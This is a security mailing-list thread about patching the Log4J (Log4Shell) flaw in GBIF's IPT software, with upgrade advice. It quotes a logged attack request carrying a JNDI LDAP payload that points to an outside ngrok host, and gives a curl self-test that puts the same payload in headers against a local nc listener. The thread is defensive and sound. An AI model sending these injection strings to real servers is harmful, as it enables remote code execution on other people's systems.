Dear IPT users, We have released a new version of the IPT, version 2.5.4 [1]. This version contains fixes to critical security issues with the Struts and Log4J[2] libraries. According to the press [3], the problem with the Log4J library vulnerability is being exploited by malicious users — and I can already see queries containing "jndi" in the web server logs for the IPTs GBIF hosts at cloud.gbif.org, although they are random attempts and would not succeed. All users are highly encouraged to upgrade to this version as soon as possible. As usual, upgrade and installation instructions are in the manual [1]. Please remember to check your data directory backup is working before starting the upgrade. [1] https://ipt.gbif.org/manual/en/ipt/2.5/releases#2-5-4-december-2021 [2] https://www.lunasec.io/docs/blog/log4j-zero-day/ [3] https://www.theguardian.com/technology/2021/dec/10/software-flaw-most-critic... Best regards, Matthew
Hi Matthew, As we've several hosted IPTs I upgraded immediately but after checking the logs it looks like it wasn't fast enough: logging% bzgrep 'jndi' http-access.log.*|grep 'ipt' http-access.log.1.bz2:Dec 11 17:04:39 router1 haproxy[14902]: 185.220.101.130 - - [11/Dec/2021:16:04:36 +0000] "GET /$%7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google%7D HTTP/1.1" 200 169114 "$#7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google#7D" "$#7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google#7D" "ipt.biodiversity.aq" Our ipts are hosted in dedicated (FreeBSD) jails and I haven't noticed something suspicious.. but is there anything that I should check for specificaly? Thanks, Julien On Sat, Dec 11, 2021 at 10:55:35AM +0100, Matthew Blissett wrote:
Dear IPT users,
We have released a new version of the IPT, version 2.5.4 [1]. This version contains fixes to critical security issues with the Struts and Log4J[2] libraries.
According to the press [3], the problem with the Log4J library vulnerability is being exploited by malicious users — and I can already see queries containing "jndi" in the web server logs for the IPTs GBIF hosts at cloud.gbif.org, although they are random attempts and would not succeed.
All users are highly encouraged to upgrade to this version as soon as possible.
As usual, upgrade and installation instructions are in the manual [1]. Please remember to check your data directory backup is working before starting the upgrade.
[1] https://ipt.gbif.org/manual/en/ipt/2.5/releases#2-5-4-december-2021
[2] https://www.lunasec.io/docs/blog/log4j-zero-day/
[3] https://www.theguardian.com/technology/2021/dec/10/software-flaw-most-critic...
Best regards,
Matthew
_______________________________________________ IPT mailing list IPT@lists.gbif.org https://lists.gbif.org/mailman/listinfo/ipt
-- Julien Cigar Belgian Biodiversity Platform (http://www.biodiversity.be) PGP fingerprint: EEF9 F697 4B68 D275 7B11 6A25 B2BB 3710 A204 23C0 No trees were killed in the creation of this message. However, many electrons were terribly inconvenienced.
Hi Julien, I don't think there would be a problem with these specific requests. The attacker has to make the IPT log the "jndi" string in the data-directory/logs/debug.log or admin.log files. You could test your own server, for example by listening on a TCP socket: nc -lvp 1234 and running a similar request: curl https://ipt.example.org/${jndi:ldap://127.0.0.1:1234/anything} -H "User-Agent: ${jndi:ldap://127.0.0.1:1234/anything}" -H "Referer: ${jndi:ldap://127.0.0.1:1234/anything}" if you have any output from 'nc', there is potential for an exploit. Cheers, Matthew On 13/12/2021 14:14, Julien Cigar wrote:
Hi Matthew,
As we've several hosted IPTs I upgraded immediately but after checking the logs it looks like it wasn't fast enough:
logging% bzgrep 'jndi' http-access.log.*|grep 'ipt' http-access.log.1.bz2:Dec 11 17:04:39 router1 haproxy[14902]: 185.220.101.130 - - [11/Dec/2021:16:04:36 +0000] "GET /$%7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google%7D HTTP/1.1" 200 169114 "$#7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google#7D" "$#7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google#7D" "ipt.biodiversity.aq"
Our ipts are hosted in dedicated (FreeBSD) jails and I haven't noticed something suspicious.. but is there anything that I should check for specificaly?
Thanks, Julien
On Sat, Dec 11, 2021 at 10:55:35AM +0100, Matthew Blissett wrote:
Dear IPT users,
We have released a new version of the IPT, version 2.5.4 [1]. This version contains fixes to critical security issues with the Struts and Log4J[2] libraries.
According to the press [3], the problem with the Log4J library vulnerability is being exploited by malicious users — and I can already see queries containing "jndi" in the web server logs for the IPTs GBIF hosts at cloud.gbif.org, although they are random attempts and would not succeed.
All users are highly encouraged to upgrade to this version as soon as possible.
As usual, upgrade and installation instructions are in the manual [1]. Please remember to check your data directory backup is working before starting the upgrade.
[1] https://ipt.gbif.org/manual/en/ipt/2.5/releases#2-5-4-december-2021
[2] https://www.lunasec.io/docs/blog/log4j-zero-day/
[3] https://www.theguardian.com/technology/2021/dec/10/software-flaw-most-critic...
Best regards,
Matthew
_______________________________________________ IPT mailing list IPT@lists.gbif.org https://lists.gbif.org/mailman/listinfo/ipt
Dear IPT users, Yesterday, the developers of the Log4J library used by the IPT issued a further security update, described at [1]. It is less severe than the first problem, since it does not allow attackers to run their own code on a hacked server. The IPT does not use this part of Log4J, so we will not release a new version of the IPT for this. It's still important to upgrade to version 2.5.4, containing Log4J version 2.15.0, as described in the email below. Best regards, Matthew [1] https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/ On 11/12/2021 10:55, Matthew Blissett wrote:
Dear IPT users,
We have released a new version of the IPT, version 2.5.4 [1]. This version contains fixes to critical security issues with the Struts and Log4J[2] libraries.
According to the press [3], the problem with the Log4J library vulnerability is being exploited by malicious users — and I can already see queries containing "jndi" in the web server logs for the IPTs GBIF hosts at cloud.gbif.org, although they are random attempts and would not succeed.
All users are highly encouraged to upgrade to this version as soon as possible.
As usual, upgrade and installation instructions are in the manual [1]. Please remember to check your data directory backup is working before starting the upgrade.
[1] https://ipt.gbif.org/manual/en/ipt/2.5/releases#2-5-4-december-2021
[2] https://www.lunasec.io/docs/blog/log4j-zero-day/
[3] https://www.theguardian.com/technology/2021/dec/10/software-flaw-most-critic...
Best regards,
Matthew
_______________________________________________ IPT mailing list IPT@lists.gbif.org https://lists.gbif.org/mailman/listinfo/ipt
participants (2)
-
Julien Cigar -
Matthew Blissett